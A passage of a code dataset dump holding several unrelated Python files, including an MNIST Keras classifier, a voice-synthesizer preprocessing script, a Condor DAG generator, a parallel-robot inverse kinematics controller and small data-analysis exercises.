self.lost=int(list1[4])\r\nhearders=next(FH)\r\nfor line in FH:\r\n data.append(cricket(line.split(',')))\r\nfor peep in data:\r\n peep.winperc=((peep.won/peep.mat)*100).__round__(2)\r\nfor final in sorted(data,key=lambda x:x.winperc,reverse=2):\r\n print(final.name)\r\n","sub_path":"classcric.py","file_name":"classcric.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"526453453","text":"import sys\n\nsys.path.append(\"../\")\nfrom core.synthesizer.preprocess import preprocess_dataset\nfrom core.synthesizer.preprocess import create_embeddings\nfrom core.synthesizer.hparams import hparams\nfrom core.utils.argutils import print_args\nfrom pathlib import Path\nimport argparse\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description=\"Preprocesses audio files from datasets, encodes them as mel spectrograms \"\n \"and writes them to the disk. Audio files are also saved, to be used by the \"\n \"vocoder for training.\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n )\n parser.add_argument(\n \"datasets_root\",\n type=Path,\n help=\"Path to the directory containing your LibriSpeech/TTS datasets.\",\n )\n parser.add_argument(\n \"-o\",\n \"--out_dir\",\n type=Path,\n default=argparse.SUPPRESS,\n help=\"Path to the output directory that will contain the mel spectrograms, the audios and the \"\n \"embeds. Defaults to /SV2TTS/synthesizer/\",\n )\n parser.add_argument(\n \"-n\",\n \"--n_processes\",\n type=int,\n default=None,\n help=\"Number of processes in parallel.\",\n )\n parser.add_argument(\n \"-s\",\n \"--skip_existing\",\n action=\"store_true\",\n help=\"Whether to overwrite existing files with the same name. Useful if the preprocessing was \"\n \"interrupted.\",\n )\n parser.add_argument(\n \"-e\",\n \"--encoder_model_fpath\",\n type=Path,\n default=\"../../saved_models/en_US/pretrained/encoder/encoder.pt\",\n help=\"Path to your trained encoder model.\",\n )\n parser.add_argument(\n \"--max_embed_processes\",\n type=int,\n default=4,\n help=\"Maximum number of parallel processes for embedding. An encoder is created for each, so \"\n \"you may need to lower this value on GPUs with low memory. Set it to 1 if CUDA is unhappy.\",\n )\n parser.add_argument(\n \"--hparams\",\n type=str,\n default=\"\",\n help=\"Hyperparameter overrides as a comma-separated list of name-value pairs\",\n )\n parser.add_argument(\n \"--no_trim\",\n action=\"store_true\",\n help=\"Preprocess audio without trimming silences (not recommended).\",\n )\n parser.add_argument(\n \"--no_alignments\",\n action=\"store_true\",\n help=\"Use this option when dataset does not include alignments\\\n (these are used to split long audio files into sub-utterances.)\",\n )\n parser.add_argument(\n \"--datasets_name\",\n type=str,\n default=\"LibriSpeech\",\n help=\"Name of the dataset directory to process.\",\n )\n parser.add_argument(\n \"--subfolders\",\n type=str,\n default=\"train-clean-100, train-clean-360\",\n help=\"Comma-separated list of subfolders to process inside your dataset directory\",\n )\n parser.add_argument(\n \"--no_mels\", action=\"store_true\", help=\"Use this option to skip mel generation.\"\n )\n parser.add_argument(\n \"--no_embeds\",\n action=\"store_true\",\n help=\"Use this option to skip embed generation.\",\n )\n\n args = parser.parse_args()\n\n # Process the arguments\n if not hasattr(args, \"out_dir\"):\n args.out_dir = args.datasets_root.joinpath(\"SV2TTS\", \"synthesizer\")\n\n # Create directories\n assert args.datasets_root.exists()\n args.out_dir.mkdir(exist_ok=True, parents=True)\n\n # Verify webrtcvad is available\n if not args.no_trim:\n try:\n import webrtcvad\n except:\n raise ModuleNotFoundError(\n \"Package 'webrtcvad' not found. This package enables \"\n \"noise removal and is recommended. Please install and try again. If installation fails, \"\n \"use --no_trim to disable this error message.\"\n )\n del args.no_trim\n\n # Get preprocess options\n process_mels = False if args.no_mels else True\n process_embeds = False if args.no_embeds else True\n del args.no_mels\n del args.no_embeds\n\n # Build args for embedding\n args_embeds = argparse.Namespace(\n encoder_model_fpath=args.encoder_model_fpath,\n n_processes=args.max_embed_processes,\n synthesizer_root=args.out_dir,\n skip_existing=args.skip_existing,\n )\n\n # Delete args not used for mel preprocessing\n del args.encoder_model_fpath\n del args.max_embed_processes\n\n # Preprocess the dataset\n print_args(args, parser)\n args.hparams = hparams.parse(args.hparams)\n\n # Preprocess mels\n if process_mels:\n print(\"Preprocessing mels...\")\n preprocess_dataset(**vars(args))\n\n # Preprocess embeds\n if process_embeds:\n print(\"Preprocessing embeds...\")\n create_embeddings(**vars(args_embeds))\n","sub_path":"mlrtvc/src/pre_processing/synthesizer_preprocess.py","file_name":"synthesizer_preprocess.py","file_ext":"py","file_size_in_byte":4851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"224350953","text":"from modulos.generador_csv import *\nfrom modulos.modulo_merge import *\nfrom modulos.panel_general_funciones import *\nfrom modulos.informacion_desarrollador import *\nfrom modulos.consulta_funciones import *\nfrom modulos.analizador_reutilizacion_codigo import *\nfrom modulos.arbol_invocacion import *\n\ndef main_main():\n \"\"\"[Autor: Tomas Yu Nakasone]\n [Ayuda: Genera fuente_unico y comentarios.csv. Y segun la opcion que tomes realizara la linea de ejecucion que corresponda.]\n \"\"\"\n archivo = \"programas.txt\"\n lista_funciones, lista_comentarios = main_generador(archivo)\n main_modulo_merge(lista_funciones, lista_comentarios)\n print(\"Ya genere fuente_unico.csv y comentarios.csv!!!\\n\")\n\n print(\"(1) - Panel general de funciones\")\n print(\"(2) - Consulta de funciones\")\n print(\"(3) - Analizador de reutilizacion de codigo\")\n print(\"(4) - Arbol de invocacion\")\n print(\"(5) - Informacion por desarrollador\")\n opcion = str(input(\"\\nEscriba el numero de la opcion que quiere: \"))\n\n if opcion == \"1\":\n print(\"\\n\")\n print(\"---PANEL GENERAL DE FUNCIONES ---------------------------------------------------------------------------------------------------------------------------------------------------------------\")\n fuente_unico = open(\"fuente_unico.csv\", \"r\")\n comentarios = open(\"comentarios.csv\", \"r\")\n arch_salida = open(\"./salidas_modulos/panel_general.csv\",\"w\")\n main_panel_general_funciones(fuente_unico, comentarios, arch_salida)\n fuente_unico.close()\n comentarios.close()\n arch_salida.close()\n \n elif opcion == \"2\":\n print(\"\\n\")\n print(\"---CONSULTA DE FUNCIONES--------\")\n comentarios = open(\"comentarios.csv\", \"r\")\n fuente_unico = open(\"fuente_unico.csv\", \"r\")\n salida = open(\"./salidas_modulos/ayuda_funciones.txt\",\"w\")\n lista_funciones = lista_de_funciones(fuente_unico)\n mostrar_cuadro(lista_funciones)\n main_consulta_funciones(fuente_unico, comentarios, salida, lista_funciones)\n comentarios.close()\n fuente_unico.close()\n salida.close()\n\n elif opcion == \"3\":\n print(\"\\n\")\n print(\"-------ANALIZADOR DE REUTILIZACION DE CODIGO--------\\n\")\n fuente_unico = open(\"fuente_unico.csv\", \"r\")\n salida = open(\"./salidas_modulos/analizador.txt\",\"w\")\n main_analizador(fuente_unico, salida)\n fuente_unico.close()\n salida.close()\n\n elif opcion == \"4\":\n print(\"\\n\")\n print(\"-------ARBOL DE INVOCACION--------\\n\")\n main = \"main_main\"\n fuente_unico = open(\"fuente_unico.csv\", \"r\")\n main_arbol_invocacion(fuente_unico, main)\n fuente_unico.close()\n\n elif opcion == \"5\":\n print(\"\\n\")\n print(\"---INFORMACION POR DESARROLLADOR--------\")\n fuente_unico = open(\"fuente_unico.csv\", \"r\")\n comentarios = open(\"comentarios.csv\", \"r\")\n arch_salida = open(\"./salidas_modulos/participacion.txt\", \"w\")\n main_informacion_desarrollador(fuente_unico, comentarios, arch_salida)\n fuente_unico.close()\n comentarios.close()\n arch_salida.close()\n\nmain_main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"174504556","text":"# %load q04_plot_runs_by_balls/build.py\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n#plt.switch_backend('agg')\nipl_df = pd.read_csv('data/ipl_dataset.csv', index_col=None)\n\n\n# Solution\ndef plot_runs_by_balls():\n x = ipl_df.groupby(['match_code','batsman']).count()['delivery']\n y = ipl_df.groupby(['match_code','batsman']).sum()['runs']\n plt.scatter(x,y)\n plt.title('Runs Scored for total balls Played')\n plt.xlabel('Balls Played')\n plt.ylabel('Runs Scored')\n plt.show()\nplot_runs_by_balls()\n\n\n","sub_path":"q04_plot_runs_by_balls/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"169452674","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\nprint((-2000**(2/3)))\nprint((abs(-2000)**(2/3)))\nprint((abs(-2000**(2/3))))\nprint(((-2000)**(2/3)).real)\nexit()\n\nt_nought = 10\nA = 1\n\nL = np.linspace(0.001,40000, 1000000)\nsigma_t = 1\n\nfront = 1/np.sqrt(2*np.pi*sigma_t**2)\n\n\ndef P_L(L):\n return front * np.exp(-0.5 * (((L/(sigma_t*A))**(0.25) - t_nought)**2)/sigma_t**2) * 0.25*(L/(sigma_t*A))**(-0.75)\n\nplt.plot(L, P_L(L))\nplt.show()\n\ndef random_sample(func, xmin, xmax, ymin, ymax, num_samples):\n \"\"\"\n Generates random positions that follow the profile of equation 2\n\n :return:\n \"\"\"\n\n inputs = []\n outputs = []\n\n while len(outputs) < num_samples: # While the number of accepted values is less than the number of required samples\n x = np.random.uniform(size=1)[0] * (xmax - xmin) + xmin # Generate random number for X\n y = np.random.uniform(size=1)[0] * (ymax - ymin) + ymin # Generate random for Y as well\n if y <= func(x): # The check for if y <= p(x), if not, its rejected, else, accepted\n inputs.append(x)\n outputs.append(y)\n\n return inputs, outputs\n\n\nx, y = random_sample(P_L, L[0], L[-1], min(P_L(L)), max(P_L(L)), num_samples=1000000)\n\nplt.hist(x, bins=10000, density=True)\nplt.title(\"X\")\nplt.show()\n\nalpha = np.linspace(0, 20, 1000)\nPosterior_alpha = pow(2,-alpha)*(alpha - 1)\nplt.plot(alpha, Posterior_alpha)\nplt.xlim(0,10)\nplt.ylabel( r'P($\\alpha$|S)', size=20)\nplt.xlabel(r'$\\alpha$', size=20)\nplt.show()\n\nprint(alpha[np.argmax(Posterior_alpha)])\n\n","sub_path":"bayesian_inference.py","file_name":"bayesian_inference.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"42784107","text":"#!/usr/bin/python3\n\ntest_list = [(3, 1, 5,100), (1, 3, 6,200), (2, 5, 7,300), \n (5, 2, 8,400), (6, 3, 0,500)] \n \n# printing original list \nprint(\"The original list is : \" + str(test_list)) \n \n# initialize ele \nele = 3\n \n# initialize K \nK = 1 \n \n# Indices of Kth element value \n# Using loop \n# using y for K = 1 \nres = [] \ncount = 0\nfor x, y, z, zz in test_list: \n if y == ele: \n res.append(count) \n count = count + 1\n\n\nprint (res)\n\nprint (test_list[1][1])\nprint (test_list[4][1])\nprint (count)\n\ndd = [a for a, b in enumerate(test_list) if b[K] == ele]\n\nprint (dd)\n\n\nfor a, b in enumerate(test_list):\n\tif b[K] == ele:\n\t\tprint (a)\n","sub_path":"aa/PYT/Reg/kth_val.py","file_name":"kth_val.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"156134155","text":"import requests\nimport pandas as pd\nimport os\nimport yaml\n\nroot_dir = os.path.abspath(os.path.dirname(__file__))\n# retrieving base url\nyaml_path = os.path.join(root_dir, '../askdata/askdata_config/base_url.yaml')\nwith open(yaml_path, 'r') as file:\n # The FullLoader parameter handles the conversion from YAML\n # scalar values to Python the dictionary format\n url_list = yaml.load(file, Loader=yaml.FullLoader)\n\n\ndef ask_dataframe(dataframe: pd.DataFrame, query: str):\n human2sql_request = {\n \"dataframe\": dataframe.to_dict(),\n \"query\": query\n }\n\n human2sql_url = url_list['BASE_URL_HUMAN2SQL_DEV']\n\n human2sql_response = requests.post(human2sql_url, json=human2sql_request)\n response_df = []\n if human2sql_response.ok:\n res = human2sql_response.json()\n if 'result' in res:\n all_dfs = res['result']\n for df in all_dfs:\n response_df.append(pd.DataFrame(df))\n if 'messages' in res and res['messages']:\n for mex in res['messages']:\n print(mex)\n else:\n print(\"Error: \"+str(human2sql_response))\n\n return response_df\n","sub_path":"askdata/human2sql.py","file_name":"human2sql.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"584677060","text":"# -*- coding:utf-8 -*-\r\n# Author: washing\r\n# DateTime: 2022/2/4 12:41\r\n# File: 1725.py\r\n# Desc: \r\nclass Solution:\r\n def countGoodRectangles(self, rectangles: List[List[int]]) -> int:\r\n l = [min(i) for i in rectangles]\r\n c = collections.Counter(l)\r\n m = max(c.keys())\r\n return c[m]\r\n","sub_path":"Solutions/1725/1725.py","file_name":"1725.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"167001088","text":"#!/usr/bin/env python\n\n#\n# LSST Data Management System\n# Copyright 2008, 2009, 2010 LSST Corporation.\n#\n# This product includes software developed by the\n# LSST Project (http://www.lsst.org/).\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the LSST License Statement and\n# the GNU General Public License along with this program. If not,\n# see .\n#\n\nimport argparse\nimport sys\nimport shlex\n\n\ndef _line_to_args(self, line):\n for arg in shlex.split(line, comments=True, posix=True):\n if not arg.strip():\n continue\n yield arg\n\n\ndef makeArgumentParser(description, inRootsRequired=True, addRegistryOption=True):\n\n parser = argparse.ArgumentParser(\n description=description,\n fromfile_prefix_chars=\"@\",\n formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog=\" \\n\"\n \"ly.\")\n parser.convert_arg_line_to_args = _line_to_args\n\n parser.add_argument(\n \"-s\", \"--source\", dest=\"source\",\n help=\"Source site for file transfer.\")\n\n parser.add_argument(\n \"-w\", \"--workerdir\", dest=\"workerdir\",\n help=\"workers directory\")\n\n parser.add_argument(\n \"-t\", \"--template\", dest=\"template\",\n help=\"template file\")\n\n parser.add_argument(\n \"-p\", \"--prescript\", dest=\"prescript\",\n help=\"pre shell script\")\n\n parser.add_argument(\n \"-r\", \"--runid\", dest=\"runid\",\n help=\"runid of this job\")\n\n parser.add_argument(\n \"-i\", \"--idsPerJob\", dest=\"idsPerJob\",\n help=\"number of ids to run per job\")\n\n return parser\n\n\ndef writeDagFile(pipeline, templateFile, infile, workerdir, prescriptFile, runid, idsPerJob):\n \"\"\"\n Write Condor Dag Submission files.\n \"\"\"\n\n print(\"Writing DAG file \")\n\n outname = pipeline + \".diamond.dag\"\n\n print(outname)\n\n outObj = open(outname, \"w\")\n\n outObj.write(\"JOB A \"+workerdir+\"/\" + pipeline + \".pre\\n\")\n outObj.write(\"JOB B \"+workerdir+\"/\" + pipeline + \".post\\n\")\n outObj.write(\" \\n\")\n\n print(\"prescriptFile = \", prescriptFile)\n if prescriptFile is not None:\n outObj.write(\"SCRIPT PRE A \"+prescriptFile+\"\\n\")\n\n print(\"First Input File loop \")\n\n # Loop over input entries\n fileObj = open(infile, \"r\")\n count = 0\n for aline in fileObj:\n count += 1\n outObj.write(\"JOB A\" + str(count) + \" \"+workerdir+\"/\" + templateFile + \"\\n\")\n\n outObj.write(\" \\n\")\n\n print(\"Second Input File loop \")\n\n # Loop over input entries\n fileObj = open(infile, \"r\")\n count = 0\n for aline in fileObj:\n count += 1\n myData = aline.rstrip()\n\n # Searching for a space detects\n # extended input like : visit=887136081 raft=2,2 sensor=0,1\n # No space is something simple like a skytile id\n if \" \" in myData:\n # Change space to :\n myList = myData.split(' ')\n new1Data = '%s:%s:%s' % tuple(myList)\n # Change = to -\n myList2 = new1Data.split('=')\n new2Data = '%s-%s-%s-%s' % tuple(myList2)\n # Change , to _\n myList3 = new2Data.split(',')\n new3Data = '%s_%s_%s' % tuple(myList3)\n\n newData = new3Data\n visit = myList[0].split('=')[1]\n else:\n newData = myData\n visit = myData\n\n # VARS A1 var1=\"visit=887136081 raft=2,2 sensor=0,1\"\n # VARS A1 var2=\"visit-887136081:raft-2_2:sensor-0_1\"\n outObj.write(\"VARS A\" + str(count) + \" var1=\\\"\" + myData + \"\\\" \\n\")\n outObj.write(\"VARS A\" + str(count) + \" var2=\\\"\" + newData + \"\\\" \\n\")\n outObj.write(\"VARS A\" + str(count) + \" visit=\\\"\" + visit + \"\\\" \\n\")\n outObj.write(\"VARS A\" + str(count) + \" runid=\\\"\" + runid + \"\\\" \\n\")\n outObj.write(\"VARS A\" + str(count) + \" workerid=\\\"\" + str(count) + \"\\\" \\n\")\n\n print(\"Third Input File loop \")\n\n fileObj = open(infile, \"r\")\n count = 0\n for aline in fileObj:\n count += 1\n # PARENT A CHILD A1\n # PARENT A1 CHILD B\n outObj.write(\"PARENT A CHILD A\" + str(count) + \" \\n\")\n outObj.write(\"PARENT A\" + str(count) + \" CHILD B \\n\")\n\n outObj.close()\n\n\ndef main():\n print('Starting generateDag.py')\n parser = makeArgumentParser(description=\"generateDag.py write a Condor DAG for job submission\"\n \"by reading input list and writing the attribute as an argument.\")\n print('Created parser')\n ns = parser.parse_args()\n print('Parsed Arguments')\n print(ns)\n\n # SA\n # templateFile = \"SourceAssoc-template.condor\"\n # pipeline = \"SourceAssoc\"\n # infile = \"sky-tiles\"\n\n # Pipeqa\n # templateFile = \"pipeqa-template.template\"\n # pipeline = \"pipeqa\"\n # infile = \"visits-449\"\n\n # processCcdLsstSim\n pipeline = \"S2012Pipe\"\n\n writeDagFile(pipeline, ns.template, ns.source, ns.workerdir, ns.prescript, ns.runid, ns.idsPerJob)\n\n sys.exit(0)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"etc/condor/scripts/generateDag.py","file_name":"generateDag.py","file_ext":"py","file_size_in_byte":5467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"379133222","text":"\nclass StdoutLog(object):\n def __init__(self, log_path, stdout, print_to_log=True, print_to_stdout=True):\n if print_to_log:\n self.log = open(log_path, 'w')\n self.str = \"\"\n self.stdout = stdout\n self.print_to_log = print_to_log\n self.print_to_stdout = print_to_stdout\n\n def write(self, incoming_str):\n if incoming_str.endswith('\\n'):\n output = self.str + incoming_str\n\n if self.print_to_log:\n self.log.write(output)\n self.log.flush()\n\n if self.print_to_stdout:\n self.stdout.write(output)\n self.stdout.flush()\n\n self.str = \"\"\n else:\n self.str = self.str + incoming_str\n\n def flush(self):\n self.stdout.flush()\n","sub_path":"TrackingByReinforcementLearning/Utilities/stdout_log.py","file_name":"stdout_log.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"18250041","text":"from multiprocessing import Process, Queue\nfrom time import sleep\n\ndef producer(n, q):\n for i in range(n):\n q.put(i)\n sleep(1)\n q.put(\"end\")\ndef consumer(q):\n v = q.get()\n v.p()\n while v != \"end\":\n v = q.get()\n # q.task_done()\n v.p()\n\nif __name__ == '__main__':\n import print_helper\n q = Queue()\n p = Process(target=producer, args=(3,q))\n p.start()\n consumer(q)\n # sleep(3)\n # if p.is_alive():\n # p.terminate()\n # p.join()","sub_path":"python/cookbook/concurrency/process_queue.py","file_name":"process_queue.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"329502131","text":"\"\"\"\nUsing Tensorflow-Keras to train a convolutional neural network (CNN) of size 784-50-10 using\nstochastic gradient descent (SGD)\n\nTo set the flag and gpu settings:\nstatement in terminal window(Bash):\n set THEANO_FLAGS=\"mode=FAST_RUN\" & set THEANO_FLAGS=\"device=gpu\"\n & set THEANO_FLAGS=\"floatX=float32\" & python mnist_keras_mlp.py\n\nThe above line runs the program as it has to be run on a conda virtual environment\n conda activate ml_conda # starts up the required virtual environment\n\"\"\"\n\nfrom keras.utils import np_utils\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense\nfrom keras.optimizers import SGD\nimport theano\nimport numpy as np\nimport struct\nimport os\n\ntheano.config.floatX='float32'\nnp.random.seed(1)\n\n\n# Loading the MNIST dataset of handwritten digits 0 to 9\ndef load_mnist(path, kind='train'):\n \"\"\"Load MNIST data from path\"\"\"\n labels_path = os.path.join(path, '{0}-labels.idx1-ubyte'.format(kind))\n images_path = os.path.join(path, '{0}-images.idx3-ubyte'.format(kind))\n\n with open(labels_path, 'rb') as lbl_path:\n magic, n = struct.unpack('>II', lbl_path.read(8))\n labels = np.fromfile(lbl_path, dtype=np.uint8)\n\n with open(images_path, 'rb') as img_path:\n magic, num, rows, cols = struct.unpack(\">IIII\", img_path.read(16))\n images = np.fromfile(img_path, dtype=np.uint8).reshape(len(labels), 784)\n\n return images, labels\n\n\nx_train, y_train = load_mnist('mnist', kind='train')\nprint('Rows:', x_train.shape[0], ' Columns:', x_train.shape[1])\nx_test, y_test = load_mnist('mnist', kind='t10k')\nprint('Rows:', x_test.shape[0], ' Columns:', x_test.shape[1])\n\nx_train = x_train.astype(theano.config.floatX)\nx_test = x_test.astype(theano.config.floatX)\n\nprint(\"First 3 labels: \", y_train[:3])\ny_train_ohe = np_utils.to_categorical(y_train)\nprint('\\nFirst 3 labels (one-hot): \\n',y_train_ohe[:3],'\\n')\n\n\nmodel = Sequential()\n# input layer\nmodel.add(Dense(input_dim=x_train.shape[1], units=50, kernel_initializer='uniform', activation='tanh'))\n# hidden layer\nmodel.add(Dense(input_dim=50, units=50, kernel_initializer='uniform', activation='tanh'))\n# output layer\nmodel.add(Dense(input_dim=50, units=y_train_ohe.shape[1], kernel_initializer='uniform', activation='softmax'))\n\n\"\"\"Upon increasing the number of hidden layers to 3 (with the same number of units - 50), i.e. 784-50-50-50-10, \na steep drop in initial accuracy and an increase in runtime from 7 to 10 minutes is seen, \nthis is due to the vanishing and exploding gradient problems. \nFinal training and testing accuracy 5% less than that using 1 hidden layer at 88 and 86% respectively \nThe increase in runtime is simply due to an increase in the number of layers.\"\"\"\n\n\"\"\" Using 100 units in the hidden layer instead of 50, i.e. 784-100-10,\nincreases runtime to nearly double , validation loss is reduced and validation accuracy increases.\nIncrease in runtime due to increased number of units in the hidden layer.\nFinal training accuracy at 96.61% and testing accuracy at 95.65%\"\"\"\n\nsgd = SGD(lr=0.001, decay=1e-7, momentum=0.9)\nmodel.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])\nmodel.fit(x_train, y_train_ohe, epochs=50, batch_size=300, verbose=1,\n validation_split=0.1)\n\ny_train_pred = model.predict_classes(x_train, verbose=0)\n# print(\"First 3 predictions: \",y_train_pred[:3])\n\ntrain_acc = np.sum(y_train==y_train_pred, axis=0) / x_train.shape[0]\nprint(\"Training accuracy: {0:.2f}%\".format(train_acc * 100))\ny_test_pred = model.predict_classes(x_test, verbose=0)\ntest_acc = np.sum(y_test==y_test_pred, axis=0) / x_test.shape[0]\nprint(\"Test accuracy: {0:.2f}%\".format(test_acc * 100))\n\n","sub_path":"mnist_keras_mlp.py","file_name":"mnist_keras_mlp.py","file_ext":"py","file_size_in_byte":3688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"611319024","text":"import pypot.dynamixel\nimport numpy as np\nimport itertools\nimport time\nimport math\n\ndef main():\n\n # Initialization of the Dynamixel Motors\n ports = pypot.dynamixel.get_available_ports()\n if not ports:\n raise IOError('no port found!')\n\n port = ports[0]\n print(\"connecting on the first available port: ports[0]\")\n dxl_io = pypot.dynamixel.DxlIO(ports[0])\n print(\"dxl_io:\"), dxl_io\n ids = dxl_io.scan([1, 2, 3, 5, 6])\n print(\"Found ids:\"), ids\n print(\"Present motor position\"), dxl_io.get_present_position(ids)\n #setting speed and position to be inital values\n #speed = dict(zip(ids, itertools.repeat(50)))\n #dxl_io.set_moving_speed(speed)\n #dxl_io.set_goal_position({2: (pos[0][0]), 6: (pos[1][0]), 5: (pos[2][0]), 3: (pos[3][0]), 1: (pos[4][0])})\n print(\"Setting up\")\n #time.sleep(2)\n zero_corr = [0.04, -20.53, 5.93, -2.86, 4.79, -5.58]\n\n #Define 6RUS design parameter\n base_length = 30 #Length of bottom platform\n top_length = 15 #Length of top platform\n l1 = 12 #Length of link1\n l2 = 24 #Length of link2\n half_angle = math.pi/6 #Please refer Ikin_convention pic\n rem_angle = math.pi/2 #Please refer Ikin_convention pic\n\n #Define Base Platform\n #Vertex 1 of base platform\n b1 = np.array([[0],[-base_length/(2*math.tan(rem_angle/2))],[-base_length/2]])\n #Vertex 2 of base platform\n rotangle = rem_angle\n Rx_clock = np.array([[1, 0, 0],[0, math.cos(rotangle), math.sin(rotangle)],[0, -math.sin(rotangle), math.cos(rotangle)]])\n b2 = Rx_clock.dot(b1)\n #Defining the rest vertices of base platform\n rotangle = rem_angle+half_angle\n Rx_clock = np.array([[1, 0, 0],[0, math.cos(rotangle), math.sin(rotangle)],[0, -math.sin(rotangle), math.cos(rotangle)]])\n b3 = Rx_clock.dot(b1)\n b4 = Rx_clock.dot(b2)\n b5 = Rx_clock.dot(b3)\n b6 = Rx_clock.dot(b4)\n \n #b1 to b6 are column vectors\n Base_matrix = np.concatenate((b1,b2,b3,b4,b5,b6), axis=1)\n #print Base_matrix\n #t0 is the epoch of the time\n #t1 is the next instant.So, the program runs till t-t0 becomes greater than time specified\n t0 = time.time()\n tr = 0\n increment = 0.01\n print(\"t0:\", t0)\n while tr - t0 <= 30:\n tr = time.time()\n #Define Trajectory\n dt = tr-t0\n print(\"TIme : \",dt)\n ex = 18\n ey = 5\n ez = 0*math.cos(dt)\n roll = 0\n pitch = 0\n yaw = 0\n translate = np.array([[ex],[ey],[ez]])\n R_roll = np.array([[math.cos(roll), -math.sin(roll), 0],[math.sin(roll), math.cos(roll), 0],[0, 0, 1]])\n R_yaw = np.array([[1, 0, 0],[0, math.cos(yaw),-math.sin(yaw)],[0, math.sin(yaw), math.cos(yaw)]])\n R_pitch = np.array([[math.cos(pitch), 0, math.sin(pitch)],[0, 1, 0],[-math.sin(pitch), 0, math.cos(pitch)]])\n\n #Defining the top platform \n t1 = np.array([[0],[-top_length/(2*math.tan(rem_angle/2))],[float(-top_length)/2]])\n #Vertex 2 of top platform\n rotangle = rem_angle\n Rx_clock = np.array([[1, 0, 0],[0, math.cos(rotangle), math.sin(rotangle)],[0, -math.sin(rotangle), math.cos(rotangle)]])\n t2 = Rx_clock.dot(t1)\n #Defining the rest vertices of top platform\n rotangle = rem_angle+half_angle\n Rx_clock = np.array([[1, 0, 0],[0, math.cos(rotangle), math.sin(rotangle)],[0, -math.sin(rotangle), math.cos(rotangle)]])\n t3 = Rx_clock.dot(t1)\n t4 = Rx_clock.dot(t2)\n t5 = Rx_clock.dot(t3)\n t6 = Rx_clock.dot(t4)\n t1f = R_roll.dot(R_pitch).dot(R_yaw).dot(t1) + translate \n t2f = R_roll.dot(R_pitch).dot(R_yaw).dot(t2) + translate\n t3f = R_roll.dot(R_pitch).dot(R_yaw).dot(t3) + translate\n t4f = R_roll.dot(R_pitch).dot(R_yaw).dot(t4) + translate\n t5f = R_roll.dot(R_pitch).dot(R_yaw).dot(t5) + translate\n t6f = R_roll.dot(R_pitch).dot(R_yaw).dot(t6) + translate\n\n Top_matrix = np.concatenate((t1f,t2f,t3f,t4f,t5f,t6f), axis=1)\n rangle = rem_angle/2\n rangle2 = rem_angle/2 + half_angle\n rangle3 = 1.5*rem_angle + half_angle\n rangle_vectclock = np.array([rangle, -rangle, -rangle2, -rangle3, rangle3, rangle2])\n #print(\"Rangle_val: \",rangle_vectclock)\n th = []\n for i in range(0,6):\n Rx_clock = np.array([[1, 0, 0],[0, math.cos(rangle_vectclock[i]), math.sin(rangle_vectclock[i])],[0, -math.sin(rangle_vectclock[i]), math.cos(rangle_vectclock[i])]])\n T = Rx_clock.dot(Top_matrix[:,i]-Base_matrix[:,i])\n th3 = -math.asin(T[2]/l2)\n pl2 = l2*math.cos(th3)\n th2 = math.acos((T[0]*T[0] + T[1]*T[1] - l1*l1 - pl2*pl2)/(2*l1*pl2))\n r = math.sqrt(l1*l1 + pl2*pl2 + 2*l1*pl2*math.cos(th2))\n phi = math.atan((l1 + pl2*math.cos(th2))/(pl2*math.sin(th2)))\n th.append(90-(((math.asin(T[0]/r))-phi)*180/math.pi))\n #print(th)\n speed = dict(zip(ids, itertools.repeat(150)))\n dxl_io.set_moving_speed(speed)\n dxl_io.set_goal_position({1: (-th[0]+zero_corr[0]), 2: (th[1]+zero_corr[1]), 3: (-th[2]+zero_corr[2]), 4: (th[3]+zero_corr[3]), 5: (-th[4]+zero_corr[4]), 6: (th[5]+zero_corr[5])})\n\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Hexa_Parallel/Python/Ikin_6RUS.py","file_name":"Ikin_6RUS.py","file_ext":"py","file_size_in_byte":5215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"82020156","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import url\n\nfrom .views import MembersBoundView, MembersImageView, SuccessView, MembersUnionid\n\nurlpatterns = [\n # 会员绑定页面\n url(r'^membersbound', MembersBoundView.as_view(), name=\"members_bound\"),\n url(r'^success', SuccessView.as_view(), 